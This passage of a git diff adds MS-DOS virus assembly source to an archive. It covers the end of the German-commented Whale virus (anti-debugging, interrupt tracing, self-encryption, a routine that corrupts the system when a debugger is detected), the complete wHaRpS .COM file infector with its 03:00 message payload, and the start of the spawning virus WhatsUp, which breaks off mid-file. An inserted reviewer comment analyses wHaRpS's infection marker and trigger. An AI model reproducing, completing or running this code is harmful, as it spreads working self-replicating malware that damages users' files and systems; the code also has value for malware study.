+ MOV AX,4200h ; SEEK from Start
+ MOV DX,001Ch ; zur Position 1Ch
+ CALL CS:[@INT21]
+
+ MCODE 84
+ JMP J046DF ; zum nchsten Teilstck
+;=====================================================================
+;=========================( Handler fr FindFirst/Findnext /ASCIIZ)===
+;=====================================================================
+J04780: MDECODE 85
+ AND WORD PTR CS:[D24B3],0FFFEH ; ZF lschen
+ CALL PopALL
+ CALL CS:[@INT21]
+ CALL PushALL
+ MCODE 85
+ JNB J047A5
+ OR WORD PTR CS:[D24B3],+01h
+J047A0 EQU $-2
+ JMP J02EA3 ; fertig
+ ;--------------------------;
+ ;J047A0: AND AL,01 ;
+ ; JMP J02EA3 ;
+ ;--------------------------;
+
+J047A5: CALL GetDTA
+ TEST BYTE Ptr DS:[BX+17h],80h
+ JNZ J047B7 ; infiziert. Verschleiern !
+ JMP J02EA3 ; Fertig
+;=====================================================================
+;=====================================================( Trash !!!
)===
+;=====================================================================
+J047B1: CLC
+ INC DX
+ PUSH DS
+ POP ES
+ PUSH DX
+ JMP J047A0 ; DB 0EBH ; sind jetzt 2 Byte zuviel
+;-------------------------------------( 'echter code 'berlappend )---
+J047B7: MDECODE 86
+ SUB WORD Ptr DS:[BX+1Ah],Code_len
+ SBB WORD Ptr DS:[BX+1Ch],+00h
+ SUB BYTE Ptr DS:[BX+17h],80h
+ MCODE 86
+ JMP J02EA3 ; fertig
+;=====================================================================
+;================================( Kopiert Wal in oberen Speicher )===
+;=====================================================================
+Wal_Ins_MEMTOP_Kopieren:
+ MDECODE 87
+ CALL J03350 ; selbsttest !
+ PUSH CS ; ursprnglich "PUSH DS",
+ ; geht aber nicht
+ XOR AX,AX
+ MOV DS,AX
+ ;-----------------------------------------------------
+ ; INT 3 wird auf 'IRET' im IBMBIO.COM gesetzt !
+ ;-----------------------------------------------------
+ MOV WORD PTR DS:[000Eh],0070h
+ MOV WORD PTR DS:[000Ch],0756h ; an Adresse 70h:756h
+ POP DS
+ MOV ES,[PSP_SEG]
+ PUSH ES
+ POP DS
+ SUB WORD Ptr DS:[0002h],0270h; MEM-TOP neu festlegen
+ MOV DX,DS ; 2700h Byte 'reservieren'
+ DEC DX ; SIEHE ZEICHNUNG GANZ OBEN !
+ MOV DS,DX ; DS:0 zeigt auf MCB
+ MOV AX,WORD PTR DS:[0003h] ; Hole Size des aktuellen MCB
+ SUB AX,0270h ; und ziehe 2700h Byte AB
+ ADD DX,AX ; DX ist jetzt "MEM-TOP"
+ MOV WORD PTR DS:[0003h],AX ; MCB ndern
+ POP DI ; DI = 2947h
+ INC DX ; 16 Byte hher
+ MOV ES,DX ; ES ist ZielSegment
+ PUSH CS
+ POP DS
+ MOV SI,26FEh ; SI = 26FE
+ MOV CX,1380h ; CX = 1380h (words)
+ ; = 2760h (byte)
+ ; = bis Stackende !
+ MOV DI,SI ; DI = SI
+ STD
+ XOR BX,BX ; BX = 0
+ MCODE 87
+
+ REPZ MOVSW ; fort ist er !
+ CLD ; erst jetzt ?!?
+ PUSH ES ; Oberes Segment
+ MOV AX,SchwimmZiel ;
+ PUSH AX ; ZIEL IST ES:01B1h
+ MOV ES,CS:[PSP_SEG] ; entsprechend CS:29C1h
+ MOV CX,WischeWeg ; CX = 236C
+ JMP Schwimme_Fort ; BX = 0
+;=====================================================================
+;=================================================( TRACE INT 13h )===
+;=====================================================================
+Trace_int_13h: MDECODE 88
+
+ MOV BYTE PTR CS:[Error],00h
+ CALL SaveRegisters
+ PUSH CS
+
+ MOV AL,13h
+ POP DS
+ CALL GetInt_AL
+
+ MOV WORD PTR DS:[Trace_Adres+2],ES
+ MOV WORD PTR DS:[Trace_Adres ],BX
+
+ MOV WORD PTR DS:[@Int_13h+2],ES
+ MOV DL,02h
+ MOV WORD PTR DS:[@Int_13h ],BX
+ MOV BYTE PTR DS:[D2450 ],DL ; DL=2, 2 bergehen
+ CALL SetInt_01
+
+ MOV WORD PTR DS:[D24DF ],SP
+ MOV WORD PTR DS:[D24DD ],SS
+
+ PUSH CS
+ MOV AX,Offset J0488D-Offset VirStart
+ PUSH AX ; RETURNADRESSE fr RETF ist
+ ; CS:J0207F, also CS:488D
+ MOV AX,0070h
+ MOV CX,0FFFFh ; Bis zum letzten Byte suchen ...
+ MOV ES,AX
+ XOR DI,DI
+ MOV AL,0CBh ; SCANNT IBMBIO nach 0CBh !!!
+ REPNZ SCASB ; Also RETF
+
+ DEC DI
+
+ PUSHF
+ PUSH ES
+ PUSH DI ; RETURNADRESSE ist "RETF" in IBMBIO.COM
+
+ PUSHF
+ POP AX
+ OR AH,01h ; Set TF
+ PUSH AX
+
+ MCODE 88
+ POPF
+ XOR AX,AX ; Reset Disk :-)
+ JMP DWORD PTR DS:[Trace_Adres] ; Return ist J0488D
+ ; JMP INT 13H
+ DB 0E9h
+;=====================================================================
+;==========================================( Rckkehr aus INT 13h )===
+;=====================================================================
+J0488D: MDECODE 89
+ PUSH CS
+ POP DS
+ PUSH DS
+ MOV AL,13h
+ LDS DX,DWORD PTR CS:[Trace_Adres]
+ CALL SetInt_AL ; RE-SET INT 13
+ POP DS
+
+ MOV AL,24h
+ CALL GetInt_AL ; GET INT 24
+
+ MOV WORD PTR DS:[D243D],BX
+ MOV DX,OFFSET J0444D-Offset VirStart
+ MOV AL,24h
+ MOV WORD PTR DS:[D243D+2],ES
+ CALL SetInt_AL ; SET INT 24
+ CALL GetRegsFromVirstack
+ PUSH DS
+ PUSH AX
+ MOV AX,0000h
+ MOV DS,AX
+ POP AX
+ MOV WORD Ptr DS:[0006h],0070h ; Segment INT 01
+ ; auf 70h setzen
+ POP DS
+ MCODE 89
+ RETN
+ DB 0F6h
+;=====================================================================
+;===========================================( Reset INT 13+INT 24 )===
+;=====================================================================
+J048CD: MDECODE 90
+ CALL SaveRegisters
+ LDS DX,CS:[@Int_13h] ; Alte Adresse INT 13
+ MOV AL,13h
+ CALL SetInt_AL ; SET INT 13
+ LDS DX,DWORD PTR CS:[D243D]; Alte Adresse INT 24
+ MOV AL,24h
+ CALL SetInt_AL ; SET INT 24
+ CALL GetRegsFromVirstack
+ MCODE 90
+ RET
+;=========================================================( trash )===
+ PUSH CS
+ POP AX
+;=====================================================================
+;=================================================( TRACE INT 21H )===
+;=====================================================================
+J048F3: MDECODE 91
+ ;----------------------( die Zahl 0401 bedeutet : )---
+ ;----------------------( 4 Ebenen, 1.
bergehen )--- + + MOV WORD PTR CS:[D2450],0401h + CALL SetInt_01 + CALL PopALL + PUSH AX + MOV AX,CS:[D24B3] + OR AX,0100h ; Set TF + PUSH AX + MCODE 91 + ;--------------------------------------------- + POPF + POP AX + POP BP + JMP CS:[Low_INT_21H] ; JMP INT 21h + ;--------------------------------------------- +;===================================================================== +J0491A: DB 00h ; alias "210A" ! ; Klein, aber fein :-) +;===================================================================== +;==========================( DIE DECODE-ROUTINE )=== +;==========================( Dekodiert jedes Wal-Hhrchen separat )=== +;===================================================================== +J0491B: PUSHF + POP CS:[D258E] + MOV CS:[D2560],AX + MOV CS:[D2562],BX + MOV CS:[D2564],CX + +J0492F: DB 26h,3bh,0,72h,2,0c3h,2,53h,89h,0c1h + DB 032h,0edh,026h,03ah,8,073h,047h,0f8h + +COMMENT # ERGIBT ; + ;------------------------------------------- + POP BX ; POP RETURNADRESSE + MOV AX,CS:[BX] ; GET WORD + ADD BX,+02h ; INC Returnadresse,2 + PUSH BX ; auf den Stack damit + ;-----------------------; AL ist Zhler + MOV CX,AX ; AH ist XOR-byte + XOR CH,CH +J00120: XOR CS:[BX],AH + INC BX + LOOP J00120 + ;------------------------------------------- + # +J04941: MOV AX,CS:[D2560] + MOV BX,CS:[D2562] + MOV CX,CS:[D2564] + PUSH CS:[D258E] + POPF + RETN +;===================================================================== +;=====================================( kodiert das separate Teil )=== +;===================================================================== +VersteckeCodeWieder: + MOV BP,AX +J04958: IN AL,40h ; Hole Zufallszahl <> 0 + OR AL,AL + JZ J04958 + POP BX ; Hole Adresse des Aufrufers + PUSH BX + MOV CX,Offset J02ACC-Offset J02AA8 + SUB BX,CX ; 24h Byte zurckgehen +J04965: XOR CS:[BX],AL + INC BX + LOOP J04965 + CALL J0496E +J0496E: POP BX + ADD BX,Offset SpielByte-Offset J0496E + ; Adresse "Spielbyte" holen + MOV CS:[BX],AL ; und den Dekodierer impfen + 
MOV AX,BP + RETN +;===================================================================== +;=======================================( dekodiert den Relokator )=== +;===================================================================== +DecodeFollowingCode: + MOV BP,AX ; AX sichern + POP BX + PUSH BX + MOV CX,Offset J02ACC-Offset J02AA8 +J0497F: XOR BYTE PTR CS:[BX],0 ; <== "Spielbyte" +Spielbyte EQU $-1 + INC BX +J04984: LOOP J0497F + MOV AX,BP +J04987 EQU $-1 ; CALL NIRWANA ! siehe unten ! + RETN ; AX zurueck +;===================================================================== +;========================================( Kodiert jede 'schuppe' )=== +;===================================================================== +CodeIT: PUSHF + POP CS:[D258E] + MOV CS:[D2560],AX + MOV CS:[D2562],BX + MOV CS:[D2564],CX + ;-------------------------------------( aus )----------------- +J0499D: DB 26h,3Bh,8Ah,0Fh,32h,72h,0E3H + ;-------------------------------------( wird )---------------- + ;J0499D: POP BX ; POP returnadresse + ; MOV CL,Byte Ptr CS:[BX] ; Get Byte in CL + ; XOR CH,CH + ; INC BX ; Return eins weiter + ;------------------------------------------------------------- + PUSH BX + MOV AX,0001h + ADD AX,CX ; AX ist Byte + 1 + SUB BX,AX ; BX ist Returnadresse-AX + ;-------------------------------------( aus )----------------- + DB 043h,040h,00ah,0c0h,074h,0fah + ;-------------------------------------( wird )---------------- + ;J049AC: IN AL,40h + ; OR AL,AL + ; JZ J049AC ; hole Zufallszahl <> 0 + ;------------------------------------------------------------- + MOV CX,CS:[BX] + XOR CH,CH + INC BX + ;-------------------------------------( aus )----------------- + DB 003h,00fh,02eh,03bh,007h,072h,0c7h,0f8h + ;-------------------------------------( wird )---------------- + ; MOV CS:[BX],AL + ;J001A0: INC BX + ; XOR CS:[BX],AL + ; LOOP J001A0 + ;------------------------------------------------------------- +J049C0: CLI + MOV AX,CS:[D2560] + MOV BX,CS:[D2562] + MOV 
CX,CS:[D2564] + PUSH CS:[D258E] + POPF + RETN +;===================================================================== +;====================================================( Der Tracer )=== +;===================================================================== +Int_01_Entry: PUSH BP + MOV BP,SP + PUSH AX + CMP WORD Ptr [BP+04h],0C000h ; Callers Segment + JNB J049ED ; hher als C000h + MOV AX,CS:[D2447] ; oder tiefer + CMP [BP+04h],AX ; als D2447 + JBE J049ED +J049EA: POP AX + POP BP + IRET +;===================================================================== +J049ED: CMP BYTE PTR CS:[D2450],01h ; Erster + JZ J04A1B + + MOV AX,[BP+04h] ; Callers CS + MOV WORD PTR CS:[Trace_Adres+2],AX + MOV AX,[BP+02h] ; Callers IP + MOV WORD PTR CS:[Trace_Adres ],AX + JB StopTrace ; [D2450] < 1 ? + POP AX + POP BP + MOV SP,CS:[D24DF] + MOV SS,CS:[D24DD] + JMP J0488D ; -> RET hier irgendwo +;==========================================( Trace-Mode abschalten)=== +StopTrace: AND WORD Ptr [BP+06h],0FEFFh + JMP J049EA +;===================================================================== +J04A1B: DEC BYTE PTR CS:[D2450+1] ; Dec (Versuche) + JNZ J049EA ; <> 0 -> weiter + AND WORD Ptr [BP+06h],0FEFFh ; sonst tracen + CALL SaveRegisters ; stoppen und : +;===================================================================== +;=======================( AUS : )===================================== +;===================================================================== +J04A2A: DB 0fch,01eh,0e2h,0e4h,040h +;===================================================================== +;========================( WIRD, ber PATCH )========================= +;===================================================================== + ;CALL J02CDA + ;IN AL,40h +;===================================================================== +;===============================================( XOR-Byte ndern )=== +;===================================================================== + MOV CS:[XorByte__1],AL ; D_4A5E + 
MOV CS:[XorByte__2],AL ; D_4A79 +;===================================================================== +;=====================================( INT 01 auf INT 03 stellen )=== +;===================================================================== +J04A39: MOV AL,03h + CALL GetInt_AL ; GET INT 3 + + PUSH ES + POP DS + MOV DX,BX ; DS:DX auf INT 3 stellen + MOV AL,01h +;================================================================= +;======( AUS : )================================================== +;================================================================= +J04A42: DB 0e8h,027h +J04A44: DB 01h ; CALL J04B6C + DB 0EAh,072h,0e1h ; JB J04A29 +;================================================================= +;===================( Wird ber PATCH )=========================== +;================================================================= + CALL SetInt_AL ; INT 01 auf INT 03 setzen + CALL POPALL +;^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ + CALL Patch_IBMDOS + CALL GetRegsFromVirstack + CALL Re_SET_Int_02 + POP AX + POP BP ; Stack putzen + + PUSH BX + PUSH CX + MOV BX,PART_____1 + MOV CX,LEN_PART_1 +J04A5B: XOR BYTE PTR CS:[BX],8Eh +D_4A5E EQU $-1 + INC BX + LOOP J04A5B + POP CX + POP BX + IRET ; ENDE von INT 01 / Tracer + DB 0E9h +;===================================================================== +;================================================( INT 21-Handler )=== +;===================================================================== +J04A66: OR BYTE PTR CS:[PART_____1],00h ; = D4BAC + ; ist Wal schon DEkodiert ? + JZ J04A7F + PUSH BX ; Nein. 
+J04A6F: PUSH CX + MOV BX,PART_____1 + MOV CX,LEN_PART_1 +J04A76: XOR BYTE PTR CS:[BX],8EH +D_4A79 EQU $-1 + INC BX + LOOP J04A76 + POP CX + POP BX +J04A7F: JMP J0458D +;===================================================================== + DB 34h +;===================================================================== +;=======================( INT 09-Handler )=== +;=======================( Bei jedem (!) Tastendruck wird geprft, )=== +;=======================( ob ein Debugger am Werk ist ! )=== +;===================================================================== +J04A83: MDECODE 92 + CALL Patch_INT_09 ; INT 9 restaurieren + CALL Debugger_Check ; Das ist der Witz dabei !!! + PUSHF + CALL CS:[INT_09 ] ; CALL INT 09 + CALL Patch_INT_09 ; Int 9 wieder patchen + MCODE 92 + IRET +;=======================================================()========= + DB 0BCH +;===================================================================== +;=======================================( Save Original-Registers )=== +;===================================================================== +SaveRegs: MOV CS:[D2575],SI + MOV CS:[D2577],DI + MOV CS:[D257B],DS + MOV CS:[D257D],ES +J04AB1: MOV CS:[D2579],AX + MOV CS:[D257F],CX + MOV CS:[D2581],BX + MOV CS:[D2590],DX + RETN + ;----------------------------------------------------- + DB 0E8h + DB 01h +;===================================================================== +;=============================( PATCHT vorhandenen INT 09-Handler )=== +;===================================================================== +KeyBoard DB 0 +Patch_INT_09: MDECODE 93 + CALL SaveRegs +;----------------------------------------------------------- + MOV SI,Offset D2570 + LES DI,CS:[INT_09 ] ; GET original INT 09 + PUSH CS + POP DS + CLD +;---------------------------( Tauscht 5 Byte ab CS:D2570 -> ES:DI )-- + MOV CX,0005h +J04ADD: LODSB + XCHG AL,ES:[DI] + MOV [SI-01h],AL + INC DI + LOOP J04ADD +;----------------------------------------( anzeige 
)------------------- + MOV AX,0B800H + MOV ES,AX + XOR DI,DI + CMP byte ptr cs:[Offset Keyboard-Offset VirStart],1 + MOV Byte ptr cs:[Offset Keyboard-Offset VirStart],0 + MOV AX,432EH + JZ ToOriginal + MOV Byte ptr cs:[Offset Keyboard-Offset VirStart],1 + MOV AX,4b57h +ToOriginal: STOSW +;----------------------------------------------------------- + CALL RestoreRegs + MCODE 93 + RETN +;===================================================================== +;====================================( GET INT 01 + INT 03 )=== +;====================================( Check, ob Debugger werkelt )=== +;===================================================================== +Debugger_Check: + MDECODE 94 + MOV CS:[D2581],BX + MOV CS:[D257D],ES + XOR BX,BX + MOV ES,BX + MOV BX,ES:[0006h] ; GET Offset von INT 01 + CMP BX,CS:[D2447] + JNB J04B27 ; TRACER AM WERK + MOV BX,ES:[000Eh] ; GET Offset von INT 03 + CMP BX,CS:[D2447] + JNB J04B27 ; DEBUGGER AM WERK + MOV ES,CS:[D257D] + MOV BX,CS:[D2581] + JMP J04B76 +;===================================================================== +;=================================================( Kill System ! )=== +;===================================================================== +J04B27: POP BX ; POP returnadresse + CALL PushALL + CALL Patch_IBMDOS ; DOS patchen + CALL PopALL + + MOV BX,CS:[D2581] + MOV ES,CS:[D257D] + + PUSHF + CALL CS:[INT_09 ] ; CALL INT 09 + + CALL PushALL + + MOV AH,51h ; get current PSP + CALL CS:[@INT21] + + MOV ES,BX +J04B4D: + MOV WORD PTR ES:[000Ch],0FFFFh; Terminate-Adresse + MOV WORD PTR ES:[000Ah],0000h ; ist FFFF:0000 !?! + CALL PopALL + CALL SaveRegs + ;---------------------------------( Wal zerstren )--- + MOV CX,IfDebugWal ; 1185h ; 230Ah Byte + MOV BX,StartDebug ; 004Fh ; ab 4Fh / 285Fh + MOV AX,0802h ; mit 0802h verORen +J04B6A: OR CS:[BX],AX ; bis 4B69 , logisch, oder .... 
+ ADD BX,+02h + LOOP J04B6A + ;---------------------------------------------------- + CALL RestoreRegs + IRET +;===================================================================== +;=========================================( Kein Debugger am Werk )=== +;===================================================================== +J04B76: MCODE 94 + RET +D4B7C: DB 0E8h +;===================================================================== +;=========( Verwischt Spuren und springt in oberen Speicherbereich)=== +;===================================================================== +Schwimme_Fort: OR BYTE PTR CS:[BX],15h ; CX = 236Ch + INC BX ; BX = 0 + LOOP Schwimme_Fort ; also von 2810 bis D4B7C + ; alles lschen + RETF ; RETF nach + ; Oberen-Speicher:01B1 + ; Identisch mit CS:29C1 +;===================================================================== +;========================================( Get Original-Registers )=== +;===================================================================== +RestoreRegs: MOV AX,CS:[D2579] + MOV ES,CS:[D257D] + MOV DS,CS:[D257B] + MOV SI,CS:[D2575] + MOV DI,CS:[D2577] + MOV CX,CS:[D257F] + MOV BX,CS:[D2581] + MOV DX,CS:[D2590] +L0L0L0: RETN +;---------------------------------------------------------------------- +D4BAC DB 00h ; Signal-Byte zur Erkennung, + ; ob Wal dekodiert ist oder nicht +;===================================================================== +;=============================================( Verschlsselt WAL )=== +;===================================================================== +Code_Whale: PUSH CX + PUSH BX + MOV BX,FirstByte + MOV CX,Code_len ; 2385h ; Wal-Size +LASTCODE: ;^^^^^^^^^^^-- LETZTES VERSCHLUESSELTE BYTE ! +;--------------------------------------------------------------------- +D4BB5: ;vvvvvvvvvvv-- HIERHER WERDEN DIE MUTANTEN KOPIERT ! 
+ PUSH DX + MOV DH,[BX-01h] +J04BB9: MOV DL,[BX ] + ADD [BX],DH + XCHG DL,DH + INC BX + LOOP J04BB9 + + POP DX + POP BX + POP CX + PUSH SI + MOV SI,2567h + DEC SI + CALL [SI] ; CALL INT 21h +;===================================================================== +;============================================( Normaler Einsprung )=== +;===================================================================== +Decode_Whale: CALL J04BD1 +J04BCF: XOR BX,SI ; DUMMY ! +J04BD1: XOR SI,1876h ; SI = 1876, kann immer + ; gendert werden + POP BX ; BX = 4BCF + POP SI + SUB BX,Code_start ; BX = 2830 + MOV CX,Code_Len ; CX = 2385 wal-size + PUSH CS + POP DS +J04BE0: MOV AL,[BX-01h] + SUB [BX],AL + INC BX + LOOP J04BE0 + ; BX = 4BB5 + ADD BX,008Eh ; BX = 4C43 / 2433 + XCHG SI,BX + DEC BYTE Ptr DS:[SI] + JNZ J04BF5 + XCHG BX,SI + RETN ; +;===================================================================== +;==============================================( Sprung zu ENTRY )=== +;===================================================================== +J04BF5: PUSH ES ; SI ist 4C43 + XOR AX,AX + POP DS + JMP ENTRY +;===================================================================== +;==========================================================( ENDE )=== +;===================================================================== + DW 0CE8BH + DW 05605H +LASTBYTE: DB 34H + +J04C01: DW 00045h + DW 05000h + DW 0DCE3h + DW 09000h + DW 00000h + DW 01F00H + DW 02000H + DB 10H +;============================================================================ +code ENDS + END start + diff --git a/MSDOS/Virus.MSDOS.Unknown.wharps.asm b/MSDOS/Virus.MSDOS.Unknown.wharps.asm new file mode 100644 index 00000000..abbed344 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.wharps.asm 
@@ -0,0 +1,336 @@ +; "One must crawl before one walks." +; wHaRpS Virus 1.0 +; wHaRpS virus of independent virus writer FirstStrike +; For use by [Phalcon\Skism] ONLY! +; Special thanx to: +; Gheap +; Dark Angel +; Demogorgon + + +name wHaRpS + title +code segment + assume cs:code,ds:code + org 100h + + +dta equ 65000d ; DTA address to be set +fname equ 65000d + 1eh ; DTA - file name +ftime equ 65000d + 16h ; DTA - file time +fsize equ 65000d + 1ah ; DTA - file size +orgdir equ 65400d ; original path storage +date equ 65300d ; store file date +time equ 65302d ; store file time +attrib equ 65304d ; store file attrib +err1 equ 65306d ; old error handler address +err2 equ 65308d ; old error handler address + +olddta equ 80h ; original DTA address + + + +begin: + nop + nop + nop + call setup ; find "delta offset" +setup: + pop bp + sub bp, offset setup + jmp main ; DEBUG E8 02 00 + nop + jmp main + +crypt_em: + xor di,di + lea si, [bp+main] + mov di, si + mov cx, end_crypt - main + +xor_loop: + lodsb ; ds:[si] -> al + db 34h ; xor al, XX +encrypt_val db 0 ; Starting encryption value is 0 + stosb ; al ->es:[di] + loop xor_loop + ret + +main: + xor di,di + mov di,0100h ; Restore first three + lea si,[bp+saveins] ; original program bytes + mov cx,0003d + rep movsb + jmp system_pic ; Take a "picture" of system settings + +handler: ; error handler + mov al,0 + iret +endp + + +data label byte +wharps db '[wHaRpS]',0 ; wHaRpS ID +author db 'FrsStrk',0 ; Me +dir_mask db '*.',0 ; dir atrib +allcom db '*.COM',0 ; what to search for +root db '\',0 ; root +saveins db 0e8h,00h,00h ; original three bytes +ultimate dw 0 ; ultimate dir to be reached +current dw 0 ; current dir +message db 'wHaRpS! It is 3:00 a.m. > ETERNAL $' + +system_pic: ; SNAP! 
+ mov ah,47h ; get original path + mov dl,0 + lea si,cs:orgdir ; store original path + int 21h + +crypt_change: ; set crypt value + mov ah,2ch + int 21h + mov [bp+encrypt_val],dl + cmp ch,03 + jz more + jmp errorh + +more: + cmp cl,00 + jz bomb + jmp errorh + +bomb: + mov ah,09h + lea dx,[bp+message] + int 21h + mov ah,4ch + int 21h + +errorh: + push es ; save original error handler address + mov ax,3524h + int 21h + mov word ptr cs:err1,bx + mov word ptr cs:err2,es + pop es + + mov ax,2524h ; set an error handler + lea dx, [bp+offset handler] ; no more Retry,Abort,Fail deals + int 21h + jmp pre_search + +drop_to_root: ; subroutine to visit the root + lea dx,[bp+root] + jmp continue + +set_path: ; OR set a path + lea dx,cs:fname + +continue: + mov ah,3bh + int 21h + ret + +return_to_search: + inc [bp+ultimate] + call drop_to_root + mov [bp+current],0000 + jmp find_first_dir + + +pre_search: ; set a DTA + mov dx,dta + mov ah,1ah + int 21h + + mov [bp+current],0000 ; zero the counters + mov [bp+ultimate],0000 ; "" + inc [bp+ultimate] ; want to search 1st dir in root + call drop_to_root ; bomb to root + +find_first_dir: ; directory searchin' + lea dx,[bp+dir_mask] + mov cx,16 + mov ah,4Eh + int 21h + jc almost_done ; no directories? + +dir_test: + inc [bp+current] ; directory found - MARK! + mov bx,[bp+current] + cmp word ptr [bp+ultimate],bx ; is it the one we want? + jnz find_next_dir ; no, find another + call set_path ; yes, set the correct path + jmp find_first_file ; find some .COMs + + + +find_next_dir: ; mo' directory searchin' + mov ah,4fh + int 21h + jc almost_done + jmp dir_test ; go see if correct dir found yet + + + +find_first_file: ; file searchin' + lea dx,[bp+allcom] + mov cx,00000001b + mov ah,4Eh + int 21h + jc return_to_search ; no .COM so mo' dir + jmp check_if_ill ; is the file "sick"? 
+ + + +find_next_file: ; keep on a searchin' + mov ah,4fh + int 21h + jc return_to_search ; no more .COM so back + ; to the directories + +check_if_ill: ; check file's health + mov ax,cs:ftime + and al,11111b ; good, your sick! + cmp al,62d/2 ; (No more 62 seconds as virus + jz find_next_file ; markers! - I swear!) + + cmp cs:fsize,60000d ; whoa, file to big! + ja find_next_file ; so, get a new one + + cmp cs:fsize,500d ; whoa, file to small! + jb find_next_file ; throw it back and move on + jmp infect ; perfect, for infection + + db 'Joy J.',0 ; don't ask + +error: +pre_done: +almost_done: + jmp done ; in case of emergency..... + +infect: + mov ah,43h ; save original attribute + mov al,00h + lea dx,cs:[fname] + int 21h + mov cs:attrib,cx + jc pre_done + + mov ax,4301h ; clear all attributes + and cx,11111110b ; (none shall slow progress) + int 21h + jc pre_done + + + mov ax,3d02h ; open the file, please + int 21h + jc pre_done + xchg bx,ax + + + + mov ax,5700h ; save the date/time + int 21h + mov cs:time,cx + mov cs:date,dx + jc pre_done + + + mov ah,3Fh ; read first 3 bytes of file + mov cx,0003h ; to be infected and save + lea dx,[bp+saveins] + int 21h + jc pre_done + + mov ax,4202h ; move to end of file + xor cx,cx + xor dx,dx + int 21h + jc pre_done + mov [bp+new_jmp],ax + + call crypt_em + +end_crypt label byte ; encrypt to here + + mov ah,40h + mov cx,endcode-begin + lea dx,[bp+begin] + int 21h ; encrypt n' write virus to end of + jc done ; file + + mov ax,4200h ; go to beginning of file + xor cx,cx + xor dx,dx + int 21h + jc done + jmp cont + +jmpc db 0e9h +new_jmp dw ? 
+ +cont: + mov ah,40h + mov cl,3 + lea dx,[bp+jmpc] + int 21h + jc done + +attrib_stuff: + + mov ax,5701h + mov cx,cs:[time] + mov dx,cs:[date] + or cl,11111b + int 21h + jc done + + mov ah,3eh + int 21h + jc done + + mov ax,4301h + mov cx,cs:[attrib] + lea dx,cs:[fname] + int 21h + jc done + +done: + mov dx,olddta ; restore all changes + mov ah,1ah + int 21h + + push ds + mov ax,2524h + lea dx,cs:[err2] + mov ds,dx + lea dx,cs:[err1] + int 21h + pop ds + + mov ah,3bh + mov dx,'/' + int 21h + + mov ah,3bh + lea dx,cs:[orgdir] + int 21h + + xor di,di + mov di,0100h + jmp di ; good_bye + + + + +endcode label byte + + + + +code ends +end begin + + diff --git a/MSDOS/Virus.MSDOS.Unknown.whatsup.asm b/MSDOS/Virus.MSDOS.Unknown.whatsup.asm new file mode 100644 index 00000000..2688a7e9 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.whatsup.asm 
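Review bot: The header comment for wharps.asm omits the on-disk infection marker, which is the first fact an analyst reading this archive needs: `check_if_ill` skips files whose timestamp seconds field already holds 62 (`and al,11111b` / `cmp al,62d/2`), `attrib_stuff` stamps that value on each victim with `or cl,11111b`, and files under 500 or over 60000 bytes are left alone. The hour/minute test in `crypt_change`..`bomb` (INT 21h/2Ch with CH=3, CL=0) is the payload trigger: at 03:00 the message is printed and the process terminates via AH=4Ch without infecting. A header line such as `; Marker: victim file time has seconds=62; targets *.COM 500-60000 bytes, one directory per run, with an INT 24h handler returning AL=0 (ignore); payload: message at 03:00` would make the listing self-describing. The `; restore all changes` comment at `done:` is also inaccurate: `mov dx,'/'` loads the immediate 002Fh rather than a pointer to the `root` string, so that chdir call does not do what the comment implies.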
@@ -0,0 +1,300 @@ +; WHATSUP.ASM -- Whats Up Virus +; Created with Nowhere Man's Virus Creation Laboratory v1.00 +; Written by Unknown User + +virus_type equ 2 ; Spawning Virus +is_encrypted equ 1 ; We're encrypted +tsr_virus equ 0 ; We're not TSR + +code segment byte public + assume cs:code,ds:code,es:code,ss:code + org 0100h + +start label near + +main proc near + call encrypt_decrypt ; Decrypt the virus + +start_of_code label near + +stop_tracing: mov cx,09EBh + mov ax,0FE05h ; Acutal move, plus a HaLT + jmp $-2 + add ah,03Bh ; AH now equals 025h + jmp $-10 ; Execute the HaLT + mov bx,offset null_vector ; BX points to new routine + push cs ; Transfer CS into ES + pop es ; using a PUSH/POP + int 021h + mov al,1 ; Disable interrupt 1, too + int 021h + jmp short skip_null ; Hop over the loop +null_vector: jmp $ ; An infinite loop +skip_null: mov byte ptr [lock_keys + 1],130 ; Prefetch unchanged +lock_keys: mov al,128 ; Change here screws DEBUG + out 021h,al ; If tracing then lock keyboard + + + mov ah,04Ah ; DOS resize memory function + mov bx,(finish - start) / 16 + 0272h ; BX holds # of para. 
+ int 021h + + mov sp,(finish - start) + 01100h ; Change top of stack + + mov si,offset spawn_name ; SI points to true filename + int 02Eh ; DOS execution back-door + push ax ; Save return value for later + + mov ax,cs ; AX holds code segment + mov ds,ax ; Restore data segment + mov es,ax ; Restore extra segment + + mov cx,0063h ; Do 99 infections +search_loop: push cx ; Save CX + call search_files ; Find and infect a file + pop cx ; Restore CX + loop search_loop ; Repeat until CX is 0 + + pop ax ; AL holds return value + mov ah,04Ch ; DOS terminate function + int 021h +main endp + + + db 06Fh,050h,0CAh,0F9h,065h + +search_files proc near + push bp ; Save BP + mov bp,sp ; BP points to local buffer + sub sp,64 ; Allocate 64 bytes on stack + + mov ah,047h ; DOS get current dir function + xor dl,dl ; DL holds drive # (current) + lea si,[bp - 64] ; SI points to 64-byte buffer + int 021h + + mov ah,03Bh ; DOS change directory function + mov dx,offset root ; DX points to root directory + int 021h + + call traverse ; Start the traversal + + mov ah,03Bh ; DOS change directory function + lea dx,[bp - 64] ; DX points to old directory + int 021h + + mov sp,bp ; Restore old stack pointer + pop bp ; Restore BP + ret ; Return to caller + +root db "\",0 ; Root directory +search_files endp + +traverse proc near + push bp ; Save BP + + mov ah,02Fh ; DOS get DTA function + int 021h + push bx ; Save old DTA address + + mov bp,sp ; BP points to local buffer + sub sp,128 ; Allocate 128 bytes on stack + + mov ah,01Ah ; DOS set DTA function + lea dx,[bp - 128] ; DX points to buffer + int 021h + + mov ah,04Eh ; DOS find first function + mov cx,00010000b ; CX holds search attributes + mov dx,offset all_files ; DX points to "*.*" + int 021h + jc leave_traverse ; Leave if no files present + +check_dir: cmp byte ptr [bp - 107],16 ; Is the file a directory? + jne another_dir ; If not, try again + cmp byte ptr [bp - 98],'.' ; Did we get a "." or ".."? 
